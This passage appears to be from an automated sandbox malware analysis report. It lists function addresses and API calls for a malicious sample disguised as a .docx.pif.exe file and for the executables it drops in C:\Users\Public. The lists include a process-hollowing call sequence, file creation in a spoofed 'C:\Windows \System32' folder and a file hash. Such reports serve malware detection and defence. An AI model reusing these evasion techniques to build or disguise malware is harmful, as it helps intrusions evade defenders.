              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B563D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,17_2_00007FF64B563D94
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B591538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,17_2_00007FF64B591538
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B5789E4 NtQueryInformationToken,NtQueryInformationToken,17_2_00007FF64B5789E4
              Source: C:\Users\Public\ger.exeCode function: 24_2_00007FF7E0A09890 NtSetInformationKey,NtQueryKey,RegQueryInfoKeyW,lstrlenW,memset,RegEnumKeyExW,RegOpenKeyExW,RegCloseKey,24_2_00007FF7E0A09890
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B565240: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,8_2_00007FF64B565240
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_029981B8 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_029981B8
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045967B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,31_2_045967B4
              Source: C:\Users\Public\alpha.exeFile created: C:\WindowsJump to behavior
              Source: C:\Users\Public\alpha.exeFile created: C:\Windows \System32Jump to behavior
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Windows \System32\per.exeJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_029820C40_2_029820C4
              Source: C:\Users\Public\Libraries\drbdmeyP.pifCode function: 3_2_0040E8003_2_0040E800
              Source: C:\Users\Public\Libraries\drbdmeyP.pifCode function: 3_2_0040C8383_2_0040C838
              Source: C:\Users\Public\Libraries\drbdmeyP.pifCode function: 3_2_0040F1CA3_2_0040F1CA
              Source: C:\Users\Public\Libraries\drbdmeyP.pifCode function: 3_2_004112503_2_00411250
              Source: C:\Users\Public\Libraries\drbdmeyP.pifCode function: 3_2_004102D03_2_004102D0
              Source: C:\Users\Public\Libraries\drbdmeyP.pifCode function: 3_2_0040B2E73_2_0040B2E7
              Source: C:\Users\Public\Libraries\drbdmeyP.pifCode function: 3_2_004102F03_2_004102F0
              Source: C:\Users\Public\Libraries\drbdmeyP.pifCode function: 3_2_004105F03_2_004105F0
              Source: C:\Users\Public\Libraries\drbdmeyP.pifCode function: 3_2_004106733_2_00410673
              Source: C:\Users\Public\Libraries\drbdmeyP.pifCode function: 3_2_004106B93_2_004106B9
              Source: C:\Users\Public\Libraries\drbdmeyP.pifCode function: 3_1_0040E8003_1_0040E800
              Source: C:\Users\Public\Libraries\drbdmeyP.pifCode function: 3_1_0040C8383_1_0040C838
              Source: C:\Users\Public\Libraries\drbdmeyP.pifCode function: 3_1_0040F1CA3_1_0040F1CA
              Source: C:\Users\Public\Libraries\drbdmeyP.pifCode function: 3_1_004112503_1_00411250
              Source: C:\Users\Public\Libraries\drbdmeyP.pifCode function: 3_1_004102D03_1_004102D0
              Source: C:\Users\Public\Libraries\drbdmeyP.pifCode function: 3_1_0040B2E73_1_0040B2E7
              Source: C:\Users\Public\Libraries\drbdmeyP.pifCode function: 3_1_004102F03_1_004102F0
              Source: C:\Users\Public\Libraries\drbdmeyP.pifCode function: 3_1_004105F03_1_004105F0
              Source: C:\Users\Public\Libraries\drbdmeyP.pifCode function: 3_1_004106733_1_00410673
              Source: C:\Users\Public\Libraries\drbdmeyP.pifCode function: 3_1_004106B93_1_004106B9
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B567D308_2_00007FF64B567D30
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B5737D88_2_00007FF64B5737D8
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B56AA548_2_00007FF64B56AA54
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B5755548_2_00007FF64B575554
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B5618848_2_00007FF64B561884
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B562C488_2_00007FF64B562C48
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B5778548_2_00007FF64B577854
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B58AC4C8_2_00007FF64B58AC4C
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B5685108_2_00007FF64B568510
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B56B0D88_2_00007FF64B56B0D8
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B5718D48_2_00007FF64B5718D4
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B563F908_2_00007FF64B563F90
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B565B708_2_00007FF64B565B70
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B569B508_2_00007FF64B569B50
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B5634108_2_00007FF64B563410
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B566BE08_2_00007FF64B566BE0
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B58AFBC8_2_00007FF64B58AFBC
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B56E6808_2_00007FF64B56E680
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B58EE888_2_00007FF64B58EE88
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B570A6C8_2_00007FF64B570A6C
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B5652408_2_00007FF64B565240
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B56D2508_2_00007FF64B56D250
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B569E508_2_00007FF64B569E50
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B5676508_2_00007FF64B567650
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B56372C8_2_00007FF64B56372C
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B587F008_2_00007FF64B587F00
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B566EE48_2_00007FF64B566EE4
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B5915388_2_00007FF64B591538
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B5742248_2_00007FF64B574224
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B5622208_2_00007FF64B562220
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B58AA308_2_00007FF64B58AA30
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B564A308_2_00007FF64B564A30
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B568DF88_2_00007FF64B568DF8
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B56CE108_2_00007FF64B56CE10
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B58D9D08_2_00007FF64B58D9D0
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B5681D48_2_00007FF64B5681D4
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B567D3010_2_00007FF64B567D30
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B5737D810_2_00007FF64B5737D8
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B56AA5410_2_00007FF64B56AA54
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B57555410_2_00007FF64B575554
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B56188410_2_00007FF64B561884
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B562C4810_2_00007FF64B562C48
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B57785410_2_00007FF64B577854
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B58AC4C10_2_00007FF64B58AC4C
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B56851010_2_00007FF64B568510
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B56B0D810_2_00007FF64B56B0D8
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B5718D410_2_00007FF64B5718D4
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B563F9010_2_00007FF64B563F90
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B565B7010_2_00007FF64B565B70
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B569B5010_2_00007FF64B569B50
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B56341010_2_00007FF64B563410
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B566BE010_2_00007FF64B566BE0
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B58AFBC10_2_00007FF64B58AFBC
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B56E68010_2_00007FF64B56E680
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B58EE8810_2_00007FF64B58EE88
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B570A6C10_2_00007FF64B570A6C
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B56524010_2_00007FF64B565240
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B56D25010_2_00007FF64B56D250
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B569E5010_2_00007FF64B569E50
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B56765010_2_00007FF64B567650
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B56372C10_2_00007FF64B56372C
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B587F0010_2_00007FF64B587F00
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B566EE410_2_00007FF64B566EE4
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B59153810_2_00007FF64B591538
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B57422410_2_00007FF64B574224
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B56222010_2_00007FF64B562220
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B58AA3010_2_00007FF64B58AA30
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B564A3010_2_00007FF64B564A30
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B568DF810_2_00007FF64B568DF8
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B56CE1010_2_00007FF64B56CE10
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B58D9D010_2_00007FF64B58D9D0
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B5681D410_2_00007FF64B5681D4
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B5737D812_2_00007FF64B5737D8
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B570A6C12_2_00007FF64B570A6C
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B56AA5412_2_00007FF64B56AA54
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B57555412_2_00007FF64B575554
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B57422412_2_00007FF64B574224
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B56188412_2_00007FF64B561884
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B562C4812_2_00007FF64B562C48
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B57785412_2_00007FF64B577854
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B58AC4C12_2_00007FF64B58AC4C
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B567D3012_2_00007FF64B567D30
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B56851012_2_00007FF64B568510
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B56B0D812_2_00007FF64B56B0D8
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B5718D412_2_00007FF64B5718D4
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B563F9012_2_00007FF64B563F90
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B565B7012_2_00007FF64B565B70
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B569B5012_2_00007FF64B569B50
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B56341012_2_00007FF64B563410
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B566BE012_2_00007FF64B566BE0
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B58AFBC12_2_00007FF64B58AFBC
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B56E68012_2_00007FF64B56E680
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B58EE8812_2_00007FF64B58EE88
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B56524012_2_00007FF64B565240
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B56D25012_2_00007FF64B56D250
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B569E5012_2_00007FF64B569E50
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B56765012_2_00007FF64B567650
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B56372C12_2_00007FF64B56372C
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B587F0012_2_00007FF64B587F00
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B566EE412_2_00007FF64B566EE4
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B59153812_2_00007FF64B591538
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B56222012_2_00007FF64B562220
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B58AA3012_2_00007FF64B58AA30
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B564A3012_2_00007FF64B564A30
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B568DF812_2_00007FF64B568DF8
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B56CE1012_2_00007FF64B56CE10
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B58D9D012_2_00007FF64B58D9D0
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B5681D412_2_00007FF64B5681D4
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B5737D814_2_00007FF64B5737D8
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B570A6C14_2_00007FF64B570A6C
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B56AA5414_2_00007FF64B56AA54
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B57555414_2_00007FF64B575554
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B57422414_2_00007FF64B574224
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B56188414_2_00007FF64B561884
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B562C4814_2_00007FF64B562C48
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B57785414_2_00007FF64B577854
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B58AC4C14_2_00007FF64B58AC4C
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B567D3014_2_00007FF64B567D30
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B56851014_2_00007FF64B568510
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B56B0D814_2_00007FF64B56B0D8
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B5718D414_2_00007FF64B5718D4
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B563F9014_2_00007FF64B563F90
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B565B7014_2_00007FF64B565B70
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B569B5014_2_00007FF64B569B50
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B56341014_2_00007FF64B563410
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B566BE014_2_00007FF64B566BE0
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B58AFBC14_2_00007FF64B58AFBC
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B56E68014_2_00007FF64B56E680
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B58EE8814_2_00007FF64B58EE88
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B56524014_2_00007FF64B565240
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B56D25014_2_00007FF64B56D250
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B569E5014_2_00007FF64B569E50
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B56765014_2_00007FF64B567650
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B56372C14_2_00007FF64B56372C
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B587F0014_2_00007FF64B587F00
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B566EE414_2_00007FF64B566EE4
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B59153814_2_00007FF64B591538
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B56222014_2_00007FF64B562220
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B58AA3014_2_00007FF64B58AA30
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B564A3014_2_00007FF64B564A30
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B568DF814_2_00007FF64B568DF8
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B56CE1014_2_00007FF64B56CE10
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B58D9D014_2_00007FF64B58D9D0
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B5681D414_2_00007FF64B5681D4
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B5737D817_2_00007FF64B5737D8
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B570A6C17_2_00007FF64B570A6C
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B56AA5417_2_00007FF64B56AA54
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B57555417_2_00007FF64B575554
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B57422417_2_00007FF64B574224
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B56188417_2_00007FF64B561884
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B562C4817_2_00007FF64B562C48
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B57785417_2_00007FF64B577854
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B58AC4C17_2_00007FF64B58AC4C
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B567D3017_2_00007FF64B567D30
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B56851017_2_00007FF64B568510
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B56B0D817_2_00007FF64B56B0D8
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B5718D417_2_00007FF64B5718D4
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B563F9017_2_00007FF64B563F90
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B565B7017_2_00007FF64B565B70
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B569B5017_2_00007FF64B569B50
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B56341017_2_00007FF64B563410
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B566BE017_2_00007FF64B566BE0
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B58AFBC17_2_00007FF64B58AFBC
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B56E68017_2_00007FF64B56E680
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B58EE8817_2_00007FF64B58EE88
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B56524017_2_00007FF64B565240
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B56D25017_2_00007FF64B56D250
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B569E5017_2_00007FF64B569E50
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B56765017_2_00007FF64B567650
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B56372C17_2_00007FF64B56372C
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B587F0017_2_00007FF64B587F00
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B566EE417_2_00007FF64B566EE4
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B59153817_2_00007FF64B591538
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B56222017_2_00007FF64B562220
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B58AA3017_2_00007FF64B58AA30
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B564A3017_2_00007FF64B564A30
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B568DF817_2_00007FF64B568DF8
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B56CE1017_2_00007FF64B56CE10
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B58D9D017_2_00007FF64B58D9D0
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B5681D417_2_00007FF64B5681D4
              Source: C:\Users\Public\xkn.exeCode function: 22_2_00007FFAAC8B0EF522_2_00007FFAAC8B0EF5
              Source: C:\Users\Public\ger.exeCode function: 24_2_00007FF7E0A0605424_2_00007FF7E0A06054
              Source: C:\Users\Public\ger.exeCode function: 24_2_00007FF7E0A0166424_2_00007FF7E0A01664
              Source: C:\Users\Public\ger.exeCode function: 24_2_00007FF7E0A0596C24_2_00007FF7E0A0596C
              Source: C:\Users\Public\ger.exeCode function: 24_2_00007FF7E0A072C024_2_00007FF7E0A072C0
              Source: C:\Users\Public\ger.exeCode function: 24_2_00007FF7E0A06EC824_2_00007FF7E0A06EC8
              Source: C:\Users\Public\ger.exeCode function: 24_2_00007FF7E0A067A024_2_00007FF7E0A067A0
              Source: C:\Users\Public\ger.exeCode function: 24_2_00007FF7E0A083D824_2_00007FF7E0A083D8
              Source: C:\Users\Public\ger.exeCode function: 24_2_00007FF7E0A06AE824_2_00007FF7E0A06AE8
              Source: C:\Users\Public\ger.exeCode function: 24_2_00007FF7E0A0405024_2_00007FF7E0A04050
              Source: C:\Users\Public\ger.exeCode function: 24_2_00007FF7E0A0431824_2_00007FF7E0A04318
              Source: C:\Users\Public\ger.exeCode function: 24_2_00007FF7E0A0512824_2_00007FF7E0A05128
              Source: C:\Users\Public\ger.exeCode function: 24_2_00007FF7E0A0989024_2_00007FF7E0A09890
              Source: C:\Users\Public\ger.exeCode function: 24_2_00007FF7E0A07C7C24_2_00007FF7E0A07C7C
              Source: C:\Users\Public\ger.exeCode function: 24_2_00007FF7E0A09C7424_2_00007FF7E0A09C74
              Source: C:\Users\Public\ger.exeCode function: 24_2_00007FF7E0A0767024_2_00007FF7E0A07670
              Source: C:\Users\Public\ger.exeCode function: 24_2_00007FF7E0A02D7024_2_00007FF7E0A02D70
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045B74E631_2_045B74E6
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045BE55831_2_045BE558
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045B877031_2_045B8770
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045BE0CC31_2_045BE0CC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0459F0FA31_2_0459F0FA
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045D415931_2_045D4159
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045B816831_2_045B8168
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045C61F031_2_045C61F0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045BE2FB31_2_045BE2FB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045D332B31_2_045D332B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045A739D31_2_045A739D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045B7D3331_2_045B7D33
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045B5E5E31_2_045B5E5E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045A6E0E31_2_045A6E0E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045BDE9D31_2_045BDE9D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_04593FCA31_2_04593FCA
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045B6FEA31_2_045B6FEA
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045B78FE31_2_045B78FE
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045B394631_2_045B3946
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045CD9C931_2_045CD9C9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045A7A4631_2_045A7A46
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0459DB6231_2_0459DB62
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045A7BAF31_2_045A7BAF
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0642108231_2_06421082
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0646E67831_2_0646E678
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_064486F531_2_064486F5
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0645941F31_2_0645941F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_064545F531_2_064545F5
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_064585AD31_2_064585AD
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0645F20731_2_0645F207
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0644804C31_2_0644804C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0645819531_2_06458195
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_06474E0831_2_06474E08
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_06458E1731_2_06458E17
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_06466E9F31_2_06466E9F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_06473FDA31_2_06473FDA
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0645EFAA31_2_0645EFAA
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_06434C7931_2_06434C79
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_06457C9931_2_06457C99
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0645ED7B31_2_0645ED7B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0643FDA931_2_0643FDA9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_06447ABD31_2_06447ABD
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0645EB4C31_2_0645EB4C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_06456B0D31_2_06456B0D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0644885E31_2_0644885E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0643E81131_2_0643E811
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_064589E231_2_064589E2
              Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\drbdmeyP.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
              Source: C:\Users\Public\Libraries\drbdmeyP.pifCode function: String function: 0040DEF0 appears 38 times
              Source: C:\Users\Public\alpha.exeCode function: String function: 00007FF64B573448 appears 90 times
              Source: C:\Users\Public\alpha.exeCode function: String function: 00007FF64B57081C appears 45 times
              Source: C:\Users\Public\alpha.exeCode function: String function: 00007FF64B57498C appears 50 times
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 045B4E10 appears 54 times
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 045B4770 appears 41 times
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 06455ABF appears 54 times
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 0645541F appears 41 times
